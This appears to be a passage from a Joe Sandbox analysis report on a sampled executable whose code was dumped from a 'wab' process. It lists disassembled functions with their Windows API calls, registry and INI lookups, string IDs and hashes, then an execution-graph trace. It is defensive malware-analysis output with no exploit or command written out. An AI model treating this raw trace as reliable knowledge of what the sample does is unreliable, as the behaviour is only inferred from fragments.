                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                  APIs
                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: InvalidateMessageRectSend
                  • String ID: d=E
                  • API String ID: 909852535-3703654223
                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                  APIs
                  • wcschr.MSVCRT ref: 0040F79E
                  • wcschr.MSVCRT ref: 0040F7AC
                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcschr$memcpywcslen
                  • String ID: "
                  • API String ID: 1983396471-123907689
                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                  APIs
                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                  • _memicmp.MSVCRT ref: 0040C00D
                  • memcpy.MSVCRT ref: 0040C024
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FilePointer_memicmpmemcpy
                  • String ID: URL
                  • API String ID: 2108176848-3574463123
                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfmemcpy
                  • String ID: %2.2X
                  • API String ID: 2789212964-323797159
                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf
                  • String ID: %%-%d.%ds
                  • API String ID: 3988819677-2008345750
                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                  APIs
                  • memset.MSVCRT ref: 0040E770
                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSendmemset
                  • String ID: F^@
                  • API String ID: 568519121-3652327722
                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PlacementWindowmemset
                  • String ID: WinPos
                  • API String ID: 4036792311-2823255486
                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                  APIs
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • wcsrchr.MSVCRT ref: 0040DCE9
                  • wcscat.MSVCRT ref: 0040DCFF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileModuleNamewcscatwcsrchr
                  • String ID: _lng.ini
                  • API String ID: 383090722-1948609170
                  • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                  • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                  • API String ID: 2773794195-880857682
                  • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                  • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID:
                  • API String ID: 438689982-0
                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                  APIs
                  • memcmp.MSVCRT ref: 00408AF3
                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                  • memcmp.MSVCRT ref: 00408B2B
                  • memcmp.MSVCRT ref: 00408B5C
                  • memcpy.MSVCRT ref: 00408B79
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID:
                  • API String ID: 231171946-0
                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcslen$wcscat$wcscpy
                  • String ID:
                  • API String ID: 1961120804-0
                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                  Execution Graph

                  Execution Coverage:2.4%
                  Dynamic/Decrypted Code Coverage:20.4%
                  Signature Coverage:0.5%
                  Total number of Nodes:849
                  Total number of Limit Nodes:16
                  execution_graph 34110 40fc40 70 API calls 34283 403640 21 API calls 34111 427fa4 42 API calls 34284 412e43 _endthreadex 34285 425115 76 API calls __fprintf_l 34286 43fe40 133 API calls 34114 425115 83 API calls __fprintf_l 34115 401445 memcpy memcpy DialogBoxParamA 34116 440c40 34 API calls 33239 444c4a 33258 444e38 33239->33258 33241 444c56 GetModuleHandleA 33242 444c68 __set_app_type __p__fmode __p__commode 33241->33242 33244 444cfa 33242->33244 33245 444d02 __setusermatherr 33244->33245 33246 444d0e 33244->33246 33245->33246 33259 444e22 _controlfp 33246->33259 33248 444d13 _initterm __getmainargs _initterm 33249 444d6a GetStartupInfoA 33248->33249 33251 444d9e GetModuleHandleA 33249->33251 33260 40cf44 33251->33260 33255 444dcf _cexit 33257 444e04 33255->33257 33256 444dc8 exit 33256->33255 33258->33241 33259->33248 33311 404a99 LoadLibraryA 33260->33311 33262 40cf60 33299 40cf64 33262->33299 33318 410d0e 33262->33318 33264 40cf6f 33322 40ccd7 ??2@YAPAXI 33264->33322 33266 40cf9b 33336 407cbc 33266->33336 33271 40cfc4 33354 409825 memset 33271->33354 33272 40cfd8 33359 4096f4 memset 33272->33359 33277 40d181 ??3@YAXPAX 33279 40d1b3 33277->33279 33280 40d19f DeleteObject 33277->33280 33278 407e30 _strcmpi 33281 40cfee 33278->33281 33383 407948 ??3@YAXPAX ??3@YAXPAX 33279->33383 33280->33279 33283 40cff2 RegDeleteKeyA 33281->33283 33284 40d007 EnumResourceTypesA 33281->33284 33283->33277 33286 40d047 33284->33286 33287 40d02f MessageBoxA 33284->33287 33285 40d1c4 33384 4080d4 ??3@YAXPAX 33285->33384 33289 40d0a0 CoInitialize 33286->33289 33364 40ce70 33286->33364 33287->33277 33381 40cc26 strncat memset RegisterClassA CreateWindowExA 33289->33381 33291 40d1cd 33385 407948 ??3@YAXPAX ??3@YAXPAX 33291->33385 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33382 40c256 PostMessageA 33293->33382 33296 40d061 ??3@YAXPAX 33296->33279 33300 40d084 DeleteObject 33296->33300 33297 40d09e 33297->33289 33299->33255 33299->33256 33300->33279 33303 40d0f9 GetMessageA 33304 40d17b 33303->33304 33305 40d10d 33303->33305 33304->33277 33306 40d113 TranslateAccelerator 33305->33306 33308 40d145 IsDialogMessage 33305->33308 33309 40d139 IsDialogMessage 33305->33309 33306->33305 33307 40d16d GetMessageA 33306->33307 33307->33304 33307->33306 33308->33307 33310 40d157 TranslateMessage DispatchMessageA 33308->33310 33309->33307 33309->33308 33310->33307 33312 404ac4 GetProcAddress 33311->33312 33315 404ae8 33311->33315 33313 404ad4 33312->33313 33314 404add FreeLibrary 33312->33314 33313->33314 33314->33315 33316 404b13 33315->33316 33317 404afc MessageBoxA 33315->33317 33316->33262 33317->33262 33319 410d17 LoadLibraryA 33318->33319 33320 410d3c 33318->33320 33319->33320 33321 410d2b GetProcAddress 33319->33321 33320->33264 33321->33320 33323 40cd08 ??2@YAPAXI 33322->33323 33325 40cd26 33323->33325 33326 40cd2d 33323->33326 33393 404025 6 API calls 33325->33393 33328 40cd66 33326->33328 33329 40cd59 DeleteObject 33326->33329 33386 407088 33328->33386 33329->33328 33331 40cd6b 33389 4019b5 33331->33389 33334 4019b5 strncat 33335 40cdbf _mbscpy 33334->33335 33335->33266 33395 407948 ??3@YAXPAX ??3@YAXPAX 33336->33395 33338 407e04 33396 407a55 33338->33396 33341 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33348 407cf7 33341->33348 33342 407ddc 33342->33338 33408 407a1f 33342->33408 33344 407d7a ??3@YAXPAX 33344->33348 33348->33338 33348->33341 33348->33342 33348->33344 33399 40796e 7 API calls 33348->33399 33400 406f30 33348->33400 33350 407e30 33351 407e57 33350->33351 33352 407e38 33350->33352 33351->33271 33351->33272 33352->33351 33353 407e41 _strcmpi 33352->33353 33353->33351 33353->33352 33414 4097ff 33354->33414 33356 409854 33419 409731 33356->33419 33360 4097ff 3 API calls 33359->33360 33361 409723 33360->33361 33439 40966c 33361->33439 33453 4023b2 33364->33453 33370 40ced3 33542 40cdda 7 API calls 33370->33542 33371 40cece 33374 40cf3f 33371->33374 33494 40c3d0 memset GetModuleFileNameA strrchr 33371->33494 33374->33296 33374->33297 33377 40ceed 33521 40affa 33377->33521 33381->33293 33382->33303 33383->33285 33384->33291 33385->33299 33394 406fc7 memset _mbscpy 33386->33394 33388 40709f CreateFontIndirectA 33388->33331 33390 4019e1 33389->33390 33391 4019c2 strncat 33390->33391 33392 4019e5 memset LoadIconA 33390->33392 33391->33390 33392->33334 33393->33326 33394->33388 33395->33348 33397 407a65 33396->33397 33398 407a5b ??3@YAXPAX 33396->33398 33397->33350 33398->33397 33399->33348 33401 406f37 malloc 33400->33401 33402 406f7d 33400->33402 33404 406f73 33401->33404 33405 406f58 33401->33405 33402->33348 33404->33348 33406 406f6c ??3@YAXPAX 33405->33406 33407 406f5c memcpy 33405->33407 33406->33404 33407->33406 33409 407a38 33408->33409 33410 407a2d ??3@YAXPAX 33408->33410 33412 406f30 3 API calls 33409->33412 33411 407a43 33410->33411 33413 40796e 7 API calls 33411->33413 33412->33411 33413->33338 33430 406f96 GetModuleFileNameA 33414->33430 33416 409805 strrchr 33417 409814 33416->33417 33418 409817 _mbscat 33416->33418 33417->33418 33418->33356 33431 44b090 33419->33431 33424 40930c 3 API calls 33425 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33424->33425 33426 4097c5 LoadStringA 33425->33426 33429 4097db 33426->33429 33428 4097f3 33428->33277 33429->33426 33429->33428 33438 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33429->33438 33430->33416 33432 40973e _mbscpy _mbscpy 33431->33432 33433 40930c 33432->33433 33434 44b090 33433->33434 33435 409319 memset GetPrivateProfileStringA 33434->33435 33436 409374 33435->33436 33437 409364 WritePrivateProfileStringA 33435->33437 33436->33424 33437->33436 33438->33429 33449 406f81 GetFileAttributesA 33439->33449 33441 409675 33442 4096ee 33441->33442 33443 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33441->33443 33442->33278 33450 409278 GetPrivateProfileStringA 33443->33450 33445 4096c9 33451 409278 GetPrivateProfileStringA 33445->33451 33447 4096da 33452 409278 GetPrivateProfileStringA 33447->33452 33449->33441 33450->33445 33451->33447 33452->33442 33544 409c1c 33453->33544 33456 401e69 memset 33583 410dbb 33456->33583 33459 401ec2 33613 4070e3 strlen _mbscat _mbscpy _mbscat 33459->33613 33460 401ed4 33598 406f81 GetFileAttributesA 33460->33598 33463 401ee6 strlen strlen 33465 401f15 33463->33465 33467 401f28 33463->33467 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33465->33614 33599 406f81 GetFileAttributesA 33467->33599 33469 401f35 33600 401c31 33469->33600 33472 401f75 33612 410a9c RegOpenKeyExA 33472->33612 33474 401c31 7 API calls 33474->33472 33475 401f91 33476 402187 33475->33476 33477 401f9c memset 33475->33477 33479 402195 ExpandEnvironmentStringsA 33476->33479 33480 4021a8 _strcmpi 33476->33480 33615 410b62 RegEnumKeyExA 33477->33615 33624 406f81 GetFileAttributesA 33479->33624 33480->33370 33480->33371 33482 40217e RegCloseKey 33482->33476 33483 401fd9 atoi 33484 401fef memset memset sprintf 33483->33484 33492 401fc9 33483->33492 33616 410b1e 33484->33616 33487 402165 33487->33482 33488 406f81 GetFileAttributesA 33488->33492 33489 402076 memset memset strlen strlen 33489->33492 33490 4070e3 strlen _mbscat _mbscpy _mbscat 33490->33492 33491 4020dd strlen strlen 33491->33492 33492->33482 33492->33483 33492->33487 33492->33488 33492->33489 33492->33490 33492->33491 33493 402167 _mbscpy 33492->33493 33623 410b62 RegEnumKeyExA 33492->33623 33493->33482 33495 40c422 33494->33495 33496 40c425 _mbscat _mbscpy _mbscpy 33494->33496 33495->33496 33497 40c49d 33496->33497 33498 40c512 33497->33498 33499 40c502 GetWindowPlacement 33497->33499 33500 40c538 33498->33500 33645 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33498->33645 33499->33498 33638 409b31 33500->33638 33504 40ba28 33505 40ba87 33504->33505 33511 40ba3c 33504->33511 33648 406c62 LoadCursorA SetCursor 33505->33648 33507 40ba43 _mbsicmp 33507->33511 33508 40ba8c 33649 410a9c RegOpenKeyExA 33508->33649 33650 404785 33508->33650 33653 403c16 33508->33653 33729 4107f1 33508->33729 33732 404734 33508->33732 33509 40baa0 33510 407e30 _strcmpi 33509->33510 33514 40bab0 33510->33514 33511->33505 33511->33507 33740 40b5e5 10 API calls 33511->33740 33512 40bafa SetCursor 33512->33377 33514->33512 33515 40baf1 qsort 33514->33515 33515->33512 34103 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33521->34103 33523 40b00e 33524 40b016 33523->33524 33525 40b01f GetStdHandle 33523->33525 34104 406d1a CreateFileA 33524->34104 33527 40b01c 33525->33527 33528 40b035 33527->33528 33529 40b12d 33527->33529 34105 406c62 LoadCursorA SetCursor 33528->34105 34109 406d77 9 API calls 33529->34109 33532 40b136 33543 40c580 28 API calls 33532->33543 33533 40b042 33535 40b087 33533->33535 33540 40b0a1 33533->33540 34106 40a57c strlen WriteFile 33533->34106 33535->33540 34107 40a699 12 API calls 33535->34107 33537 40b0d6 33538 40b116 CloseHandle 33537->33538 33539 40b11f SetCursor 33537->33539 33538->33539 33539->33532 33540->33537 34108 406d77 9 API calls 33540->34108 33542->33371 33543->33374 33556 409a32 33544->33556 33547 409c80 memcpy memcpy 33548 409cda 33547->33548 33548->33547 33549 409d18 ??2@YAPAXI ??2@YAPAXI 33548->33549 33553 408db6 12 API calls 33548->33553 33550 409d54 ??2@YAPAXI 33549->33550 33552 409d8b 33549->33552 33550->33552 33566 409b9c 33552->33566 33553->33548 33555 4023c1 33555->33456 33557 409a44 33556->33557 33558 409a3d ??3@YAXPAX 33556->33558 33559 409a52 33557->33559 33560 409a4b ??3@YAXPAX 33557->33560 33558->33557 33561 409a63 33559->33561 33562 409a5c ??3@YAXPAX 33559->33562 33560->33559 33563 409a83 ??2@YAPAXI ??2@YAPAXI 33561->33563 33564 409a73 ??3@YAXPAX 33561->33564 33565 409a7c ??3@YAXPAX 33561->33565 33562->33561 33563->33547 33564->33565 33565->33563 33567 407a55 ??3@YAXPAX 33566->33567 33568 409ba5 33567->33568 33569 407a55 ??3@YAXPAX 33568->33569 33570 409bad 33569->33570 33571 407a55 ??3@YAXPAX 33570->33571 33572 409bb5 33571->33572 33573 407a55 ??3@YAXPAX 33572->33573 33574 409bbd 33573->33574 33575 407a1f 4 API calls 33574->33575 33576 409bd0 33575->33576 33577 407a1f 4 API calls 33576->33577 33578 409bda 33577->33578 33579 407a1f 4 API calls 33578->33579 33580 409be4 33579->33580 33581 407a1f 4 API calls 33580->33581 33582 409bee 33581->33582 33582->33555 33584 410d0e 2 API calls 33583->33584 33585 410dca 33584->33585 33586 410dfd memset 33585->33586 33625 4070ae 33585->33625 33587 410e1d 33586->33587 33628 410a9c RegOpenKeyExA 33587->33628 33590 401e9e strlen strlen 33590->33459 33590->33460 33592 410e4a 33593 410e7f _mbscpy 33592->33593 33629 410d3d _mbscpy 33592->33629 33593->33590 33595 410e5b 33630 410add RegQueryValueExA 33595->33630 33597 410e73 RegCloseKey 33597->33593 33598->33463 33599->33469 33631 410a9c RegOpenKeyExA 33600->33631 33602 401c4c 33603 401cad 33602->33603 33632 410add RegQueryValueExA 33602->33632 33603->33472 33603->33474 33605 401c6a 33606 401c71 strchr 33605->33606 33607 401ca4 RegCloseKey 33605->33607 33606->33607 33608 401c85 strchr 33606->33608 33607->33603 33608->33607 33609 401c94 33608->33609 33633 406f06 strlen 33609->33633 33611 401ca1 33611->33607 33612->33475 33613->33460 33614->33467 33615->33492 33636 410a9c RegOpenKeyExA 33616->33636 33618 410b34 33619 410b5d 33618->33619 33637 410add RegQueryValueExA 33618->33637 33619->33492 33621 410b4c RegCloseKey 33621->33619 33623->33492 33624->33480 33626 4070bd GetVersionExA 33625->33626 33627 4070ce 33625->33627 33626->33627 33627->33586 33627->33590 33628->33592 33629->33595 33630->33597 33631->33602 33632->33605 33634 406f17 33633->33634 33635 406f1a memcpy 33633->33635 33634->33635 33635->33611 33636->33618 33637->33621 33639 409b40 33638->33639 33641 409b4e 33638->33641 33646 409901 memset SendMessageA 33639->33646 33642 409b99 33641->33642 33643 409b8b 33641->33643 33642->33504 33647 409868 SendMessageA 33643->33647 33645->33500 33646->33641 33647->33642 33648->33508 33649->33509 33651 4047a3 33650->33651 33652 404799 FreeLibrary 33650->33652 33651->33509 33652->33651 33654 4107f1 FreeLibrary 33653->33654 33655 403c30 LoadLibraryA 33654->33655 33656 403c74 33655->33656 33657 403c44 GetProcAddress 33655->33657 33658 4107f1 FreeLibrary 33656->33658 33657->33656 33659 403c5e 33657->33659 33660 403c7b 33658->33660 33659->33656 33662 403c6b 33659->33662 33661 404734 3 API calls 33660->33661 33663 403c86 33661->33663 33662->33660 33741 4036e5 33663->33741 33666 4036e5 26 API calls 33667 403c9a 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403ca4 33668->33669 33670 4036e5 26 API calls 33669->33670 33671 403cae 33670->33671 33753 4085d2 33671->33753 33679 403ce5 33680 403cf7 33679->33680 33936 402bd1 39 API calls 33679->33936 33801 410a9c RegOpenKeyExA 33680->33801 33683 403d0a 33684 403d1c 33683->33684 33937 402bd1 39 API calls 33683->33937 33802 402c5d 33684->33802 33688 4070ae GetVersionExA 33689 403d31 33688->33689 33820 410a9c RegOpenKeyExA 33689->33820 33691 403d51 33692 403d61 33691->33692 33938 402b22 46 API calls 33691->33938 33821 410a9c RegOpenKeyExA 33692->33821 33695 403d87 33696 403d97 33695->33696 33939 402b22 46 API calls 33695->33939 33822 410a9c RegOpenKeyExA 33696->33822 33699 403dbd 33700 403dcd 33699->33700 33940 402b22 46 API calls 33699->33940 33823 410808 33700->33823 33704 404785 FreeLibrary 33705 403de8 33704->33705 33827 402fdb 33705->33827 33708 402fdb 34 API calls 33709 403e00 33708->33709 33843 4032b7 33709->33843 33718 403e3b 33720 403e73 33718->33720 33721 403e46 _mbscpy 33718->33721 33890 40fb00 33720->33890 33942 40f334 334 API calls 33721->33942 33730 410807 33729->33730 33731 4107fc FreeLibrary 33729->33731 33730->33509 33731->33730 33733 404785 FreeLibrary 33732->33733 33734 40473b LoadLibraryA 33733->33734 33735 40474c GetProcAddress 33734->33735 33738 40476e 33734->33738 33736 404764 33735->33736 33735->33738 33736->33738 33737 404781 33737->33509 33738->33737 33739 404785 FreeLibrary 33738->33739 33739->33737 33740->33511 33742 4037c5 33741->33742 33743 4036fb 33741->33743 33742->33666 33943 410863 UuidFromStringA UuidFromStringA memcpy 33743->33943 33745 40370e 33745->33742 33746 403716 strchr 33745->33746 33746->33742 33747 403730 33746->33747 33944 4021b6 memset 33747->33944 33749 40373f _mbscpy _mbscpy strlen 33750 4037a4 _mbscpy 33749->33750 33751 403789 sprintf 33749->33751 33945 4023e5 16 API calls 33750->33945 33751->33750 33754 4085e2 33753->33754 33946 4082cd 11 API calls 33754->33946 33758 408600 33759 403cba 33758->33759 33760 40860b memset 33758->33760 33771 40821d 33759->33771 33949 410b62 RegEnumKeyExA 33760->33949 33762 4086d2 RegCloseKey 33762->33759 33764 408637 33764->33762 33765 40865c memset 33764->33765 33950 410a9c RegOpenKeyExA 33764->33950 33953 410b62 RegEnumKeyExA 33764->33953 33951 410add RegQueryValueExA 33765->33951 33768 408694 33952 40848b 10 API calls 33768->33952 33770 4086ab RegCloseKey 